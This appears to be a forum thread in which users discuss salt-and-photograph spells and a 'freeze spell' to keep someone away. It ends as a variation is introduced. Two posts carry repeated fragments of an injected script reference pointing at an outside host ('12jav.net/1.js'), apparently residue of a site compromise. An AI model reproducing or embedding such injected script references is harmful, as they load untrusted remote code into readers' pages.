Can I use salt and pictures of someone to cause them to stop sending negativity towards myself and friends and also to have them to not come around? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Sure, it is a mineral of protection, and purification. A good idea would be to fill a jar/cup/bag with salt (sea or black is fine) then put the picture in it and say a simple spell :) . sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I believe a freeze spell would be much more successful. It's a very popular spell. Here is one variation.
